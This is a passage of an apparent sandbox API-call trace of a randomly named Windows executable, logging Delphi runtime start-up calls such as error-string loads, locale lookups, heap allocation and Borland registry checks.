(in: hInstance=0x13ce000, uID=0xffd3, lpBuffer=0x41f3ac, cchBufferMax=1024 | out: lpBuffer="Variant or safe array is locked") returned 0x1f [0042.545] LoadStringA (in: hInstance=0x13ce000, uID=0xffd4, lpBuffer=0x41f3ac, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f [0042.545] LoadStringA (in: hInstance=0x13ce000, uID=0xffef, lpBuffer=0x41f3ac, cchBufferMax=1024 | out: lpBuffer="Read") returned 0x4 [0042.545] LoadStringA (in: hInstance=0x13ce000, uID=0xffd2, lpBuffer=0x41f3ac, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29 [0042.545] LoadStringA (in: hInstance=0x13ce000, uID=0xffee, lpBuffer=0x41f3ac, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22 [0042.545] LoadStringA (in: hInstance=0x13ce000, uID=0xffeb, lpBuffer=0x41f3ac, cchBufferMax=1024 | out: lpBuffer="Application Error") returned 0x11 [0042.545] LoadStringA (in: hInstance=0x13ce000, uID=0xffd1, lpBuffer=0x41f3ac, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24 [0042.545] LoadStringA (in: hInstance=0x13ce000, uID=0xffd0, lpBuffer=0x41f3ac, cchBufferMax=1024 | out: lpBuffer="Write") returned 0x5 [0042.545] LoadStringA (in: hInstance=0x13ce000, uID=0xffe4, lpBuffer=0x41f3ac, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16 [0042.545] LoadStringA (in: hInstance=0x13ce000, uID=0xffe5, lpBuffer=0x41f3ac, cchBufferMax=1024 | out: lpBuffer="Access violation at address %p. %s of address %p") returned 0x30 [0042.545] LoadStringA (in: hInstance=0x13ce000, uID=0xffe6, lpBuffer=0x41f3ac, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10 [0042.545] LoadStringA (in: hInstance=0x13ce000, uID=0xffe3, lpBuffer=0x41f3ac, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19 [0042.545] LoadStringA (in: hInstance=0x13ce000, uID=0xffe1, lpBuffer=0x41f3ac, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17 [0042.545] LoadStringA (in: hInstance=0x13ce000, uID=0xffff, lpBuffer=0x41f3ac, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20 [0042.545] LoadStringA (in: hInstance=0x13ce000, uID=0xfffe, lpBuffer=0x41f3ac, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10 [0042.545] LoadStringA (in: hInstance=0x13ce000, uID=0xfffd, lpBuffer=0x41f3ac, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11 [0042.545] LoadStringA (in: hInstance=0x13ce000, uID=0xfffc, lpBuffer=0x41f3ac, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10 [0042.545] LoadStringA (in: hInstance=0x13ce000, uID=0xfffb, lpBuffer=0x41f3ac, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15 [0042.545] LoadStringA (in: hInstance=0x13ce000, uID=0xfffa, lpBuffer=0x41f3ac, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9 [0042.545] LoadStringA (in: hInstance=0x13ce000, uID=0xfff9, lpBuffer=0x41f3ac, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17 [0042.545] LoadStringA (in: hInstance=0x13ce000, uID=0xfff8, lpBuffer=0x41f3ac, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12 [0042.545] LoadStringA (in: hInstance=0x13ce000, uID=0xfff7, lpBuffer=0x41f3ac, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13 [0042.545] LoadStringA (in: hInstance=0x13ce000, uID=0xfff6, lpBuffer=0x41f3ac, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10 [0042.546] LoadStringA (in: hInstance=0x13ce000, uID=0xfff5, lpBuffer=0x41f3ac, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe [0042.546] LoadStringA (in: hInstance=0x13ce000, uID=0xfff4, lpBuffer=0x41f3ac, cchBufferMax=1024 | out: lpBuffer="I/O error %d") returned 0xc [0042.546] LoadStringA (in: hInstance=0x13ce000, uID=0xfff3, lpBuffer=0x41f3ac, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd [0042.546] LoadStringA (in: hInstance=0x13ce000, uID=0xfff2, lpBuffer=0x41f3ac, cchBufferMax=1024 | out: lpBuffer="Invalid argument to date encode") returned 0x1f [0042.597] LoadStringA (in: hInstance=0x13ce000, uID=0xfff0, lpBuffer=0x41f398, cchBufferMax=1024 | out: lpBuffer="'%s' is not a valid integer value") returned 0x21 [0042.597] LoadStringA (in: hInstance=0x13ce000, uID=0xffe0, lpBuffer=0x41f398, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f [0042.597] GetVersionExA (in: lpVersionInformation=0x41f730*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x77c70362, dwMinorVersion=0x77c6e192, dwBuildNumber=0x3, dwPlatformId=0x77947f36, szCSDVersion="E") | out: lpVersionInformation=0x41f730*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0042.597] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0042.597] GetProcAddress (hModule=0x76d30000, lpProcName="GetDiskFreeSpaceExA") returned 0x76dc434f [0042.597] GetThreadLocale () returned 0x409 [0042.597] GetThreadLocale () returned 0x409 [0042.597] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x41f608, cchData=256 | out: lpLCData="Jan") returned 4 [0042.597] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x41f608, cchData=256 | out: lpLCData="January") returned 8 [0042.597] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x41f608, cchData=256 | out: lpLCData="Feb") returned 4 [0042.597] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x41f608, cchData=256 | out: lpLCData="February") returned 9 [0042.598] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x41f608, cchData=256 | out: lpLCData="Mar") returned 4 [0042.598] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x41f608, cchData=256 | out: lpLCData="March") returned 6 [0042.598] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x41f608, cchData=256 | out: lpLCData="Apr") returned 4 [0042.598] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x41f608, cchData=256 | out: lpLCData="April") returned 6 [0042.598] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x41f608, cchData=256 | out: lpLCData="May") returned 4 [0042.598] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x41f608, cchData=256 | out: lpLCData="May") returned 4 [0042.598] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x41f608, cchData=256 | out: lpLCData="Jun") returned 4 [0042.598] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x41f608, cchData=256 | out: lpLCData="June") returned 5 [0042.598] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x41f608, cchData=256 | out: lpLCData="Jul") returned 4 [0042.598] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x41f608, cchData=256 | out: lpLCData="July") returned 5 [0042.598] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x41f608, cchData=256 | out: lpLCData="Aug") returned 4 [0042.598] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x41f608, cchData=256 | out: lpLCData="August") returned 7 [0042.598] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x41f608, cchData=256 | out: lpLCData="Sep") returned 4 [0042.598] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x41f608, cchData=256 | out: lpLCData="September") returned 10 [0042.598] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x41f608, cchData=256 | out: lpLCData="Oct") returned 4 [0042.598] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x41f608, cchData=256 | out: lpLCData="October") returned 8 [0042.598] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x41f608, cchData=256 | out: lpLCData="Nov") returned 4 [0042.598] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x41f608, cchData=256 | out: lpLCData="November") returned 9 [0042.598] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x41f608, cchData=256 | out: lpLCData="Dec") returned 4 [0042.598] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x41f608, cchData=256 | out: lpLCData="December") returned 9 [0042.598] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x41f608, cchData=256 | out: lpLCData="Sun") returned 4 [0042.598] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x41f608, cchData=256 | out: lpLCData="Sunday") returned 7 [0042.598] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x41f608, cchData=256 | out: lpLCData="Mon") returned 4 [0042.599] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x41f608, cchData=256 | out: lpLCData="Monday") returned 7 [0042.599] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x41f608, cchData=256 | out: lpLCData="Tue") returned 4 [0042.599] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x41f608, cchData=256 | out: lpLCData="Tuesday") returned 8 [0042.599] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x41f608, cchData=256 | out: lpLCData="Wed") returned 4 [0042.599] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x41f608, cchData=256 | out: lpLCData="Wednesday") returned 10 [0042.599] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x41f608, cchData=256 | out: lpLCData="Thu") returned 4 [0042.599] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x41f608, cchData=256 | out: lpLCData="Thursday") returned 9 [0042.599] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x41f608, cchData=256 | out: lpLCData="Fri") returned 4 [0042.599] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x41f608, cchData=256 | out: lpLCData="Friday") returned 7 [0042.599] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x41f608, cchData=256 | out: lpLCData="Sat") returned 4 [0042.599] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x41f608, cchData=256 | out: lpLCData="Saturday") returned 9 [0042.599] GetThreadLocale () returned 0x409 [0042.599] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x41f664, cchData=256 | out: lpLCData="$") returned 2 [0042.599] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x41f664, cchData=256 | out: lpLCData="0") returned 2 [0042.619] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x41f664, cchData=256 | out: lpLCData="0") returned 2 [0042.619] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x41f75c, cchData=2 | out: lpLCData=",") returned 2 [0042.619] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x41f75c, cchData=2 | out: lpLCData=".") returned 2 [0042.619] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x41f664, cchData=256 | out: lpLCData="2") returned 2 [0042.619] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x41f75c, cchData=2 | out: lpLCData="/") returned 2 [0042.619] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x41f664, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0042.619] GetThreadLocale () returned 0x409 [0042.619] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x41f630, cchData=256 | out: lpLCData="1") returned 2 [0042.619] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x41f664, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0042.619] GetThreadLocale () returned 0x409 [0042.619] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x41f630, cchData=256 | out: lpLCData="1") returned 2 [0042.619] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x41f75c, cchData=2 | out: lpLCData=":") returned 2 [0042.620] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x41f664, cchData=256 | out: lpLCData="AM") returned 3 [0042.620] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x41f664, cchData=256 | out: lpLCData="PM") returned 3 [0042.620] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x41f664, cchData=256 | out: lpLCData="0") returned 2 [0042.620] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x41f664, cchData=256 | out: lpLCData="0") returned 2 [0042.620] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x41f664, cchData=256 | out: lpLCData="0") returned 2 [0042.620] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x41f75c, cchData=2 | out: lpLCData=",") returned 2 [0042.620] HeapCreate (flOptions=0x0, dwInitialSize=0x88000, dwMaximumSize=0x88000) returned 0x610000 [0042.732] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x10000) returned 0x610590 [0042.732] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x10000) returned 0x620598 [0042.732] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x10000) returned 0x6305a0 [0042.732] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x10000) returned 0x6405a8 [0042.732] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x10000) returned 0x6505b0 [0042.732] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x10000) returned 0x6605b8 [0042.732] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x10000) returned 0x6705c0 [0042.733] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x10000) returned 0x6805c8 [0042.950] LocalAlloc (uFlags=0x40, uBytes=0x2c) returned 0x6d6a08 [0042.950] GetKeyboardType (nTypeFlag=0) returned 4 [0042.978] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe\" " [0042.978] GetStartupInfoA (in: lpStartupInfo=0x41f78c | out: lpStartupInfo=0x41f78c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0042.978] GetVersion () returned 0x1db10106 [0042.978] GetVersion () returned 0x1db10106 [0042.978] GetCurrentThreadId () returned 0xba4 [0043.062] GetModuleFileNameA (in: hModule=0x13c0000, lpFilename=0x41f288, nSize=0x105 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\waqro5owezanslij.exe")) returned 0x3a [0043.062] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x41f163, nSize=0x105 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\waqro5owezanslij.exe")) returned 0x3a [0043.062] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x41f278 | out: phkResult=0x41f278*=0x0) returned 0x2 [0043.062] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x41f278 | out: phkResult=0x41f278*=0x0) returned 0x2 [0043.062] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x41f278 | out: phkResult=0x41f278*=0x0) returned 0x2 [0043.062] lstrcpynA (in: lpString1=0x41f163, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe", iMaxLength=261 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe" [0043.062] GetThreadLocale () returned 0x409 [0043.062] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x41f273, cchData=5 | out: lpLCData="ENU") returned 4 [0043.062] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe") returned 58 [0043.062] lstrcpynA (in: lpString1=0x41f19a, lpString2="ENU", iMaxLength=206 | out: lpString1="ENU") returned="ENU" [0043.062] LoadLibraryExA (lpLibFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.ENU", hFile=0x0, dwFlags=0x2) returned 0x0 [0043.197] lstrcpynA (in: lpString1=0x41f19a, lpString2="EN", iMaxLength=206 | out: lpString1="EN") returned="EN" [0043.197] LoadLibraryExA (lpLibFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.EN", hFile=0x0, dwFlags=0x2) returned 0x0 [0043.197] LoadStringA (in: hInstance=0x13ce000, uID=0xffc2, lpBuffer=0x41f3ac, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c [0043.247] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x6d8388 [0043.365] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0xae0000 [0043.365] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x6d9388 [0043.365] VirtualAlloc (lpAddress=0xae0000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0xae0000 [0043.365] LoadStringA (in: hInstance=0x13ce000, uID=0xffc1, lpBuffer=0x41f3ac, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17 [0043.365] LoadStringA (in: hInstance=0x13ce000, uID=0xffdf, lpBuffer=0x41f3ac, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0043.365] LoadStringA (in: hInstance=0x13ce000, uID=0xffc0, lpBuffer=0x41f3ac, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10 [0043.365] LoadStringA (in: hInstance=0x13ce000, uID=0xffd2, lpBuffer=0x41f3ac, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29 [0043.366] LoadStringA (in: hInstance=0x13ce000, uID=0xffdb, lpBuffer=0x41f3ac, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10 [0043.366] LoadStringA (in: hInstance=0x13ce000, uID=0xffd1, lpBuffer=0x41f3ac, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24 [0043.366] LoadStringA (in: hInstance=0x13ce000, uID=0xffee, lpBuffer=0x41f3ac, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22 [0043.366] LoadStringA (in: hInstance=0x13ce000, uID=0xffd5, lpBuffer=0x41f3ac, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19 [0043.366] LoadStringA (in: hInstance=0x13ce000, uID=0xffd4, lpBuffer=0x41f3ac, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f [0043.366] LoadStringA (in: hInstance=0x13ce000, uID=0xffe7, lpBuffer=0x41f3ac, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe [0043.366] LoadStringA (in: hInstance=0x13ce000, uID=0xffe8, lpBuffer=0x41f3ac, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd [0043.366] LoadStringA (in: hInstance=0x13ce000, uID=0xffe9, lpBuffer=0x41f3ac, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16 [0043.366] LoadStringA (in: hInstance=0x13ce000, uID=0xffe6, lpBuffer=0x41f3ac, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10 [0043.366] LoadStringA (in: hInstance=0x13ce000, uID=0xffe4, lpBuffer=0x41f3ac, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16 [0043.366] LoadStringA (in: hInstance=0x13ce000, uID=0xffe2, lpBuffer=0x41f3ac, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18 [0043.366] LoadStringA (in: hInstance=0x13ce000, uID=0xffe1, lpBuffer=0x41f3ac, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17 [0043.366] LoadStringA (in: hInstance=0x13ce000, uID=0xffe0, lpBuffer=0x41f3ac, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f [0043.366] LoadStringA (in: hInstance=0x13ce000, uID=0xffff, lpBuffer=0x41f3ac, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20 [0043.366] LoadStringA (in: hInstance=0x13ce000, uID=0xfffe, lpBuffer=0x41f3ac, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10 [0043.366] LoadStringA (in: hInstance=0x13ce000, uID=0xfffd, lpBuffer=0x41f3ac, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11 [0043.366] LoadStringA (in: hInstance=0x13ce000, uID=0xfffc, lpBuffer=0x41f3ac, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10 [0043.366] LoadStringA (in: hInstance=0x13ce000, uID=0xfffb, lpBuffer=0x41f3ac, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15 [0043.366] LoadStringA (in: hInstance=0x13ce000, uID=0xfffa, lpBuffer=0x41f3ac, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9 [0043.366] LoadStringA (in: hInstance=0x13ce000, uID=0xfff9, lpBuffer=0x41f3ac, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17 [0043.366] LoadStringA (in: hInstance=0x13ce000, uID=0xfff8, lpBuffer=0x41f3ac, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12 [0043.366] LoadStringA (in: hInstance=0x13ce000, uID=0xfff7, lpBuffer=0x41f3ac, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13 [0043.366] LoadStringA (in: hInstance=0x13ce000, uID=0xfff6, lpBuffer=0x41f3ac, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10 [0043.366] LoadStringA (in: hInstance=0x13ce000, uID=0xfff5, lpBuffer=0x41f3ac, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe [0043.391] LoadStringA (in: hInstance=0x13ce000, uID=0xfff3, lpBuffer=0x41f398, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd [0043.391] LoadStringA (in: hInstance=0x13ce000, uID=0xffe3, lpBuffer=0x41f398, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19 [0043.391] GetVersionExA (in: lpVersionInformation=0x41f730*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x10000, dwMinorVersion=0x10008, dwBuildNumber=0x6805c2, dwPlatformId=0x6805c0, szCSDVersion="") | out: lpVersionInformation=0x41f730*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0043.416] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0043.417] GetProcAddress (hModule=0x76d30000, lpProcName="GetDiskFreeSpaceExA") returned 0x76dc434f [0043.417] GetThreadLocale () returned 0x409 [0043.442] GetThreadLocale () returned 0x409 [0043.442] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x41f608, cchData=256 | out: lpLCData="Jan") returned 4 [0043.442] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x41f608, cchData=256 | out: lpLCData="January") returned 8 [0043.442] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x41f608, cchData=256 | out: lpLCData="Feb") returned 4 [0043.442] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x41f608, cchData=256 | out: lpLCData="February") returned 9 [0043.442] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x41f608, cchData=256 | out: lpLCData="Mar") returned 4 [0043.442] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x41f608, cchData=256 | out: lpLCData="March") returned 6 [0043.442] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x41f608, cchData=256 | out: lpLCData="Apr") returned 4 [0043.457] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x41f608, cchData=256 | out: lpLCData="April") returned 6 [0043.457] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x41f608, cchData=256 | out: lpLCData="May") returned 4 [0043.457] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x41f608, cchData=256 | out: lpLCData="May") returned 4 [0043.457] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x41f608, cchData=256 | out: lpLCData="Jun") returned 4 [0043.457] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x41f608, cchData=256 | out: lpLCData="June") returned 5 [0043.457] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x41f608, cchData=256 | out: lpLCData="Jul") returned 4 [0043.457] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x41f608, cchData=256 | out: lpLCData="July") returned 5 [0043.457] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x41f608, cchData=256 | out: lpLCData="Aug") returned 4 [0043.458] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x41f608, cchData=256 | out: lpLCData="August") returned 7 [0043.458] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x41f608, cchData=256 | out: lpLCData="Sep") returned 4 [0043.458] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x41f608, cchData=256 | out: lpLCData="September") returned 10 [0043.458] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x41f608, cchData=256 | out: lpLCData="Oct") returned 4 [0043.458] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x41f608, cchData=256 | out: lpLCData="October") returned 8 [0043.458] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x41f608, cchData=256 | out: lpLCData="Nov") returned 4 [0043.458] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x41f608, cchData=256 | out: lpLCData="November") returned 9 [0043.458] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x41f608, cchData=256 | out: lpLCData="Dec") returned 4 [0043.458] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x41f608, cchData=256 | out: lpLCData="December") returned 9 [0043.458] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x41f608, cchData=256 | out: lpLCData="Sun") returned 4 [0043.458] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x41f608, cchData=256 | out: lpLCData="Sunday") returned 7 [0043.458] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x41f608, cchData=256 | out: lpLCData="Mon") returned 4 [0043.458] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x41f608, cchData=256 | out: lpLCData="Monday") returned 7 [0043.458] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x41f608, cchData=256 | out: lpLCData="Tue") returned 4 [0043.458] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x41f608, cchData=256 | out: lpLCData="Tuesday") returned 8 [0043.458] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x41f608, cchData=256 | out: lpLCData="Wed") returned 4 [0043.459] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x41f608, cchData=256 | out: lpLCData="Wednesday") returned 10 [0043.459] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x41f608, cchData=256 | out: lpLCData="Thu") returned 4 [0043.459] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x41f608, cchData=256 | out: lpLCData="Thursday") returned 9 [0043.459] GetLocaleInfoA (in: Locale=0x409, 